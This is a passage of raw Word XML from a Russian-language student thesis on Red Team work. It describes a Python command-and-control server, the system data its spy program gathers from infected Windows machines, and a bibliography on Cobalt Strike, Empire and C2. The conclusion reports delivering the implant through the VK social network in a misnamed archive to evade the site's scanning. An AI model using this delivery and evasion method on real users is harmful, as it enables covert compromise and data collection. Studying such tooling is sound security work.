    </w:p>
    <w:p w14:paraId="7FDFF282" w14:textId="5279CD66" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="00B252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программы приведен в Приложении А</w:t>
      </w:r>
      <w:r w:rsidR="00375B3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67589E" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A32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BF74C0" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="00B2520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3.2 Серверная часть</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEEAAF1" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="00B2520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проектировании серверной части выбор пал на язык программирования Python, так как он позволял решить ряд проблем и помочь в выполнении главного требования, которое предъявляется к системам такого рода – стабильная работа на протяж</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ении долгого времени.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E209414" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="00B2520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Перечислим главные проблемы, которые позволял решить переход на Python:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DD8368" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="00B2520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709" w:hanging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Независимость от входных данных – благодаря слабой типизации, достаточно легко исключить большинство ситуации с внештатным вводом, поступившим на один из прослушиваемых портов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7706F2D6" w14:textId="58BBAA3D" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="00B2520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709" w:hanging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Удобство администрирования и разработки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609EF593" w14:textId="3165F50B" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="00B2520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Серверная часть являет собой программу</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, в чьи задачи входит</w:t>
      </w:r>
      <w:r w:rsidR="00771D59">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> широкий спектр задач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D3FEFBA" w14:textId="77777777" w:rsidR="002A3235" w:rsidRPr="00B2520C" w:rsidRDefault="00EE7791" w:rsidP="00B2520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Мониторинг всех входящих запросов;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DC9EEB" w14:textId="77777777" w:rsidR="002A3235" w:rsidRPr="00B2520C" w:rsidRDefault="00EE7791" w:rsidP="00B2520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Пеленгация и запись IP-адресов и портов, что позволяет вести учет саботированных машин;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C969E0" w14:textId="77777777" w:rsidR="002A3235" w:rsidRPr="00B2520C" w:rsidRDefault="00EE7791" w:rsidP="00B2520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Обработка поступающих данных в режиме реального времени;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73EF7B4E" w14:textId="77777777" w:rsidR="002A3235" w:rsidRPr="00B2520C" w:rsidRDefault="00EE7791" w:rsidP="00B2520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Отработка прописанных заранее скриптов, для решения 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ирокого спектра целей, на основании поступивших данных.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455A63BC" w14:textId="77777777" w:rsidR="002A3235" w:rsidRPr="00B2520C" w:rsidRDefault="00EE7791" w:rsidP="00B2520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Мониторинг статуса зараженных машин;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B0FBA3" w14:textId="412DB3C8" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="00B2520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отчетов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D4DB21" w14:textId="7D2E8300" w:rsidR="00A0519F" w:rsidRDefault="00661BA8" w:rsidP="00881508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Результатом совместной работы сервера и программы-шпиона является список данных о системе, представленный на Рис. 6.</w:t>
      </w:r>
      <w:r w:rsidR="00A051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Данная информация </w:t>
      </w:r>
      <w:r w:rsidR="00A0519F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>несет в себе следующую полезную нагрузку:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B4D6FA" w14:textId="6D9B1D72" w:rsidR="00A0519F" w:rsidRDefault="00A0519F" w:rsidP="00A0519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709" w:hanging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нформация о DNS имени компьютера;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA82A89" w14:textId="6773E21E" w:rsidR="00A0519F" w:rsidRDefault="00A0519F" w:rsidP="00A0519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709" w:hanging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ерсия операционной системы;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E15344C" w14:textId="77777777" w:rsidR="007F03E4" w:rsidRDefault="00A0519F" w:rsidP="007F03E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709" w:hanging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нформация о начинке:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E00F4AA" w14:textId="77777777" w:rsidR="007F03E4" w:rsidRDefault="00A0519F" w:rsidP="007F03E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color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F03E4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7F03E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>перативная память – количество установленной оперативной памяти;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755F8238" w14:textId="356E92C2" w:rsidR="00A0519F" w:rsidRPr="007F03E4" w:rsidRDefault="00A0519F" w:rsidP="007F03E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color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F03E4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7F03E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>роцессор – версия, архитектура, ревизия;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C138B36" w14:textId="1432D1C0" w:rsidR="00A0519F" w:rsidRDefault="00A0519F" w:rsidP="00A0519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709" w:hanging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установленное на машине время;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D093F9" w14:textId="7C648837" w:rsidR="00A0519F" w:rsidRDefault="00A0519F" w:rsidP="00A0519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709" w:hanging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информация о пути к корневой папке Windows;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C98CF4" w14:textId="37CA9181" w:rsidR="00A0519F" w:rsidRPr="00266DC4" w:rsidRDefault="00A0519F" w:rsidP="00A0519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709" w:hanging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данные обо всех доступных интернет адаптерах и их базовые настройки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573C6375" w14:textId="7AF29306" w:rsidR="00881508" w:rsidRDefault="00A0519F" w:rsidP="00A0519F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Полученный пакет данных </w:t>
      </w:r>
      <w:r w:rsidR="00661BA8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обрабатывается и сохраняется на сервере до востребования.</w:t>
      </w:r>
      <w:r w:rsidR="00881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184BFAB" w14:textId="7425550A" w:rsidR="00661BA8" w:rsidRDefault="00881508" w:rsidP="00881508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 обработки входящих данных представлен на Рис. 7, где происходит принятие решения о дальнейших действиях на основании установленной версии ОС на инфицированной рабочей станции.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9129A6" w14:textId="77777777" w:rsidR="00147B10" w:rsidRDefault="00147B10" w:rsidP="00147B10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7B1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3156F18D" wp14:editId="2AB56F3B">
            <wp:extent cx="6120765" cy="2532380"/>
            <wp:effectExtent l="0" t="0" r="0" b="127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2C94" w14:textId="269F5864" w:rsidR="00147B10" w:rsidRPr="00B2520C" w:rsidRDefault="00147B10" w:rsidP="00147B10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Рис.6 Содержимое полученного сервером пакета.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A860522" w14:textId="2BC8FC57" w:rsidR="00661BA8" w:rsidRPr="00147B10" w:rsidRDefault="00661BA8" w:rsidP="00147B10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107D66" w14:textId="67A8022E" w:rsidR="00881508" w:rsidRDefault="00881508" w:rsidP="00147B10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1508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3688FEE" wp14:editId="4D66628B">
            <wp:extent cx="5763429" cy="847843"/>
            <wp:effectExtent l="0" t="0" r="889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7CE4" w14:textId="453CD400" w:rsidR="00661BA8" w:rsidRDefault="00661BA8" w:rsidP="00661BA8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</w:t>
      </w:r>
      <w:r w:rsidR="00147B10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47B10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 обработки входящих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99DD4C6" w14:textId="0C9EB76F" w:rsidR="00A0519F" w:rsidRPr="00A0519F" w:rsidRDefault="00A0519F" w:rsidP="00661BA8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B27BFA" w14:textId="70BE8156" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="00B2520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Полученный в результате работы инструмент обладает</w:t>
      </w:r>
      <w:r w:rsidR="00771D59">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> упрощенным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перечнем необходимых возможностей, позволяет легко добавлять новый функционал и обладает огром</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ным потенциалом для дальнейшей модернизации и интеграции дополнительных функций.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D93BD0" w14:textId="00164987" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="00B2520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Код программы приведен в Приложении </w:t>
      </w:r>
      <w:r w:rsidR="00375B3D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman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06FF10" w14:textId="4873BC23" w:rsidR="00771D59" w:rsidRDefault="00771D59" w:rsidP="00B2520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0574D1" w14:textId="3B5F3132" w:rsidR="00771D59" w:rsidRDefault="00771D59" w:rsidP="00B2520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EF18A4" w14:textId="68911E5F" w:rsidR="00771D59" w:rsidRDefault="00771D59" w:rsidP="00B2520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4717B4" w14:textId="1C650B2A" w:rsidR="00771D59" w:rsidRDefault="00771D59" w:rsidP="00B2520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6A1BA1" w14:textId="35B715F2" w:rsidR="00771D59" w:rsidRDefault="00771D59" w:rsidP="00B2520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D1A5E0" w14:textId="44D56EB9" w:rsidR="007F03E4" w:rsidRDefault="007F03E4" w:rsidP="00B2520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057BB5" w14:textId="2C67BA0E" w:rsidR="007F03E4" w:rsidRDefault="007F03E4" w:rsidP="00B2520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5962C3" w14:textId="77777777" w:rsidR="007F03E4" w:rsidRDefault="007F03E4" w:rsidP="00B2520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D57819" w14:textId="77777777" w:rsidR="00771D59" w:rsidRDefault="00771D59" w:rsidP="00A0519F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D88B7B" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="00B2520C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2E6BBD42" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="00B2520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рамках данной работы была разработана система удаленного сбора информации со скомпрометированных рабочих станций. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76486311" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="00B2520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Стоит отметить основные результаты, которые были получены в процессе написания, исходя из поставленных задач:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520D7810" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="00B2520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Среди основных теоретических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аспектов парадигмы Red Team выделено две основных задачи, неотрывно связанные между собой: задача взаимодействия на зараженной машине, и задача контроля и управления действиями на зараженной машине.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C3E570" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="00B2520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необходимая основа изучены первоочередные инструменты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используемые в рамках парадигмы Red Team. Важно отметить, что данные инструменты стремительно меняются, обновляются или перестают быть доступными по ряду причин.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B45DB8C" w14:textId="33CFB5C6" w:rsidR="002A3235" w:rsidRPr="00147B10" w:rsidRDefault="00EE7791" w:rsidP="00B2520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качестве практической части была разработана и реализована система, позволяющая удаленно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олучить информацию о подвергшейся заражению машине.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427D462B" w14:textId="32961E9A" w:rsidR="00147B10" w:rsidRDefault="00147B10" w:rsidP="00B2520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Тестирование системы проводилось посредством размещения командной программы на удаленном арендуемом сервере компании </w:t>
      </w:r>
      <w:r w:rsidRPr="00147B10">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>simplecloud.ru</w:t>
      </w:r>
      <w:r w:rsidR="003326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Программа-шпион доставлялась посредством социальной сети </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0033260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Vk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00332602" w:rsidRPr="0033260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3260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</w:t>
      </w:r>
      <w:r w:rsidR="00332602">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, через архив с неправильным расширением, что позволило избежать детектирования средствами проверки социальной сети. Программа отработала без вызова дополнительных предупреждений, исключая стандартное требование подтвердить пользователя выполнение исполняемого файла.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620445E0" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE77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Среди основных аспектов, характеризующих разработанную систему, можно выделить отсутствие программных закладок и высокую способность к последующим модификациям, что является хорошей основой для дальнейшего развития инструмента.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FECB12" w14:textId="4A43116F" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="00332602">
      <w:pP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2520C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данной работо</w:t>
      </w:r>
      <w:r w:rsidRPr="00B2520C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>й был представлен новый взгляд на вопрос сбора информации отечественным программным обеспечением</w:t>
      </w:r>
      <w:r w:rsidR="0033260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EC15591" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE779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262DED70" w14:textId="5585322C" w:rsidR="00DB04FF" w:rsidRDefault="00EE7791" w:rsidP="00DB04F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709" w:hanging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такое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Metasploit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 Руководство для начинающих [Электронный источник] – URL: </w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidR="00DB04FF" w:rsidRPr="001B5576">
          <w:rPr>
            <w:rStyle w:val="af"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>https://habr.com/ru/company/varonis/blog/528578/?ysclid=l53i08yuj7541448789</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="51C2AB4D" w14:textId="65C0C010" w:rsidR="00DB04FF" w:rsidRDefault="00EE7791" w:rsidP="00DB04F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709" w:hanging="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pP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What Is Cobalt Strike and How Can Security Researchers Use It? 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[Электронный источник] – URL: </w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidR="00DB04FF" w:rsidRPr="001B5576">
          <w:rPr>
            <w:rStyle w:val="af"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>https://www.makeuseof.com/cobalt-strike-explanation-and-uses/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="514F1A90" w14:textId="77777777" w:rsidR="00DB04FF" w:rsidRDefault="00EE7791" w:rsidP="00DB04F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709" w:hanging="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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Command-and-control servers: The puppet masters that govern malware [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Электронный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источник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 – URL: </w:t>
      </w:r>
      <w:hyperlink r:id="rId21">
        <w:r w:rsidRPr="00DB04FF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https://www.techtarget.com/searchsecurity/feature/Command-and-control-servers-The-puppet-masters-that-govern-malware</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="05CC46B0" w14:textId="77777777" w:rsidR="00DB04FF" w:rsidRPr="00DB04FF" w:rsidRDefault="00EE7791" w:rsidP="00DB04F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709" w:hanging="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pP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Что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такое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Command and Control? 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инфраструктуры управления и контроля [Электронный источник] – URL:  </w:t>
      </w:r>
      <w:hyperlink r:id="rId22">
        <w:r w:rsidRPr="00DB04F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https://habr.com/ru/company/varonis/blog/559512/?ysclid=l53s9v8y5f882730081</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="617BC61A" w14:textId="77777777" w:rsidR="00DB04FF" w:rsidRDefault="00EE7791" w:rsidP="00DB04F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709" w:hanging="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pP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Обзор рынка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услуг по оценке </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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киберзащищённости</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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методом Red Team Operations в России из за рубежом [Электронный источник] – URL: </w:t>
      </w:r>
      <w:hyperlink r:id="rId23">
        <w:r w:rsidRPr="00DB04F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https://www.anti-malware.ru/analytics/Market_Analysis/Red-Team-Operations-market-overview</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="29DFDB5F" w14:textId="77777777" w:rsidR="00DB04FF" w:rsidRDefault="00EE7791" w:rsidP="00DB04F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709" w:hanging="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pP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Red </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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eaming</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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комплексная имитация атак. Методология и инструменты [Электронный источник] – URL: </w:t>
      </w:r>
      <w:hyperlink r:id="rId24">
        <w:r w:rsidRPr="00DB04F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https://habr.com/ru/company/varonis/blog/524308/?ysclid=l55ad5omnm140281</w:t>
        </w:r>
        <w:r w:rsidRPr="00DB04F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30</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4BED07CF" w14:textId="77777777" w:rsidR="00DB04FF" w:rsidRPr="00DB04FF" w:rsidRDefault="00EE7791" w:rsidP="00DB04F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709" w:hanging="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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Can Your </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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Organisation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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Be Breached? Find Out with a Red Team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[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Электронный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источник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 – URL: </w:t>
      </w:r>
      <w:hyperlink r:id="rId25" w:history="1">
        <w:r w:rsidR="00332602" w:rsidRPr="00DB04FF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https://blogs.cisco.com/security/can-your-organisation-be-breached-find-out-with-a-red-team</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4F0C47B4" w14:textId="77777777" w:rsidR="00DB04FF" w:rsidRDefault="00DC4343" w:rsidP="00DB04F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709" w:hanging="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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Cobalt Strike Analysis and Tutorial: CS Metadata Encoding and Decoding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hyperlink r:id="rId26" w:history="1">
        <w:r w:rsidRPr="00DB04FF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/>
          </w:rPr>
          <w:t>https://unit42.paloaltonetworks.com/cobalt-strike-metadata-encoding-decoding/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="010F110E" w14:textId="200AA2D6" w:rsidR="00DB04FF" w:rsidRDefault="00DC4343" w:rsidP="00DB04F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709" w:hanging="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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Red-Team-Infrastructure-Wiki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Электронный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источник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] </w:t>
      </w:r>
      <w:r w:rsidR="003F5014" w:rsidRPr="00DB04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– URL: </w:t>
      </w:r>
      <w:hyperlink r:id="rId27" w:history="1">
        <w:r w:rsidR="00DB04FF" w:rsidRPr="001B5576">
          <w:rPr>
            <w:rStyle w:val="af"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2D52EF1D" w14:textId="77777777" w:rsidR="00DB04FF" w:rsidRDefault="00DB04FF" w:rsidP="00DB04F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709" w:hanging="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pP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="00DC4343"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Viper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DC4343"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3F5014"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 w:rsidR="003F5014"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Электронный источник] – URL: </w:t>
      </w:r>
      <w:hyperlink r:id="rId28" w:history="1">
        <w:r w:rsidR="00DC4343" w:rsidRPr="00DB04F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https://github.com/FunnyWolf/Viper</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3E036C6F" w14:textId="77777777" w:rsidR="00DB04FF" w:rsidRDefault="00DC4343" w:rsidP="00DB04F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709" w:hanging="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/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Awesome</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003F5014"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CobaltStrike</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003F5014"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3F5014"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[Электронный</w:t>
      </w:r>
      <w:r w:rsidR="003F5014"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3F5014"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источник] – URL: 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29" w:history="1">
        <w:r w:rsidRPr="00DB04F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https://github.com/zer0yu/Awesome-CobaltStrike</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="58DDFBC5" w14:textId="77777777" w:rsidR="00DB04FF" w:rsidRDefault="00DC4343" w:rsidP="00DB04F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709" w:hanging="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pP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Awesome</w:t>
      </w:r>
      <w:r w:rsidR="003F5014"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Red</w:t>
      </w:r>
      <w:r w:rsidR="003F5014"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Teaming</w:t>
      </w:r>
      <w:r w:rsidR="003F5014"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3F5014"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[Электронный</w:t>
      </w:r>
      <w:r w:rsidR="003F5014"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3F5014"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источник] – URL: </w:t>
      </w:r>
      <w:hyperlink r:id="rId30" w:history="1">
        <w:r w:rsidR="003F5014" w:rsidRPr="00DB04F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https://github.com/yeyintminthuhtut/Awesome-Red-Teaming</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="26722BF0" w14:textId="77777777" w:rsidR="00DB04FF" w:rsidRDefault="00DC4343" w:rsidP="00DB04F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709" w:hanging="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pP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Как</w:t>
      </w:r>
      <w:r w:rsidR="003F5014"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</w:t>
      </w:r>
      <w:r w:rsidR="003F5014"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версию</w:t>
      </w:r>
      <w:r w:rsidR="003F5014"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Windows?</w:t>
      </w:r>
      <w:r w:rsidR="003F5014"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3F5014"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[Электронный</w:t>
      </w:r>
      <w:r w:rsidR="003F5014"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3F5014"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источник] – URL: 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31" w:history="1">
        <w:r w:rsidRPr="00DB04F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https://habr.com/ru/company/ruvds/blog/672410/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1FD84DC0" w14:textId="77777777" w:rsidR="00DB04FF" w:rsidRDefault="00DC4343" w:rsidP="00DB04F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709" w:hanging="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/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PowerShell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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Empire: продвинутая пост-эксплуатация Windows систем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F5014"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[Электронный</w:t>
      </w:r>
      <w:r w:rsidR="003F5014"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3F5014"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источник] – URL: </w:t>
      </w:r>
      <w:hyperlink r:id="rId32" w:history="1">
        <w:r w:rsidRPr="00DB04F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https://habr.com/ru/post/351592/?ysclid=l56nlejv2b348182192</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7330CAD3" w14:textId="77777777" w:rsidR="00DB04FF" w:rsidRDefault="00DC4343" w:rsidP="00DB04F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709" w:hanging="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pP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Empire</w:t>
      </w:r>
      <w:r w:rsidR="003F5014"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3F5014"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[Электронный</w:t>
      </w:r>
      <w:r w:rsidR="003F5014"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3F5014"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источник] – URL: </w:t>
      </w:r>
      <w:hyperlink r:id="rId33" w:history="1">
        <w:r w:rsidR="003F5014" w:rsidRPr="00DB04F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https://github.com/EmpireProject/Empire?ysclid=l56nlgi6x3278929696</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="14C4ED98" w14:textId="77777777" w:rsidR="00DB04FF" w:rsidRDefault="003F5014" w:rsidP="00DB04F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709" w:hanging="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pP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sysinfoapi.h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header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[Электронный источник] – URL: </w:t>
      </w:r>
      <w:hyperlink r:id="rId34" w:history="1">
        <w:r w:rsidRPr="00DB04F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https://docs.microsoft.com/en-us/windows/win32/api/sysinfoapi/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="00C66ADD" w14:textId="77777777" w:rsidR="00DB04FF" w:rsidRDefault="003F5014" w:rsidP="00DB04F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709" w:hanging="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pP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Command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Control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[Электронный источник] – URL: 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35" w:history="1">
        <w:r w:rsidR="00DB04FF" w:rsidRPr="00DB04F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https://attack.mitre.org/tactics/TA0011/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5D6138B6" w14:textId="77777777" w:rsidR="00DB04FF" w:rsidRDefault="00DB04FF" w:rsidP="00DB04F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709" w:hanging="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
